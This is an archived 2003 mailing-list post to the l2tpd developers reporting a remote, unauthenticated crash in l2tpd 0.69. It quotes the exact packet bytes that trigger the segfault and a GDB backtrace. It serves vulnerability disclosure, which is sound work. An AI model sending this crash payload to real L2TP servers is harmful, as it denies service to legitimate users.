[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]

Remote SIGSEGV in l2tpd

To: l2tpd-devel@l2tpd.org
Subject: Remote SIGSEGV in l2tpd
From: Renaud Deraison <deraison@nessus.org>
Date: Fri, 14 Mar 2003 19:38:51 +0100
Reply-to: l2tpd-devel@l2tpd.org
Sender: owner-l2tpd-devel@l2tpd.org
User-agent: Mutt/1.4i



Hi,

I found a denial of service on l2tpd 0.69 - if an attacker sends
data {0xC8,2,0,20,0,0,0,0,0,0,0,0,0,8, 0,0,0,0,0,3} to the LT2PD
server, l2tpd dies with a segfault. An attacker may use this flaw to
prevent legitimate users from connecting via L2TPD.
There's no need for pre-authentication or whatever.

GDB backtrace shows :
Program received signal SIGSEGV, Segmentation fault.
0x280ed04e in vfprintf () from /usr/lib/libc.so.4
(gdb) bt
#0  0x280ed04e in vfprintf () from /usr/lib/libc.so.4
#1  0x280b5d1e in vsnprintf () from /usr/lib/libc.so.4
#2  0x804afdd in log (level=6, 
    fmt=0x80575e0 "%s: Connection established to %s, %d.  Local: %d,
    Remote: %d.  LNS session is '%s'\n") at misc.c:37
#3  0x804c4f8 in control_finish (t=0x8065800, c=0x8065c00) at
    control.c:623
#4  0x804dcf1 in handle_packet (buf=0x8063000, t=0x8065800, c=0x8065c00)
        at control.c:1692
#5  0x80527ce in network_thread () at network.c:405
#6  0x804af1e in main (argc=3, argv=0xbfbff9e0) at l2tpd.c:1123
#7  0x804930d in _start ()



				-- Renaud
-- 
Renaud Deraison
The Nessus Project
http://www.nessus.org

Prev by Subject: Re: Remove my email from your mailing list
Next by Subject: release 0.65.1
Previous by thread: rp-l2tpd: info/requets and a little qestion...
Next by thread: l2tpd on big endian machines
Index(es):
- Subject
- Thread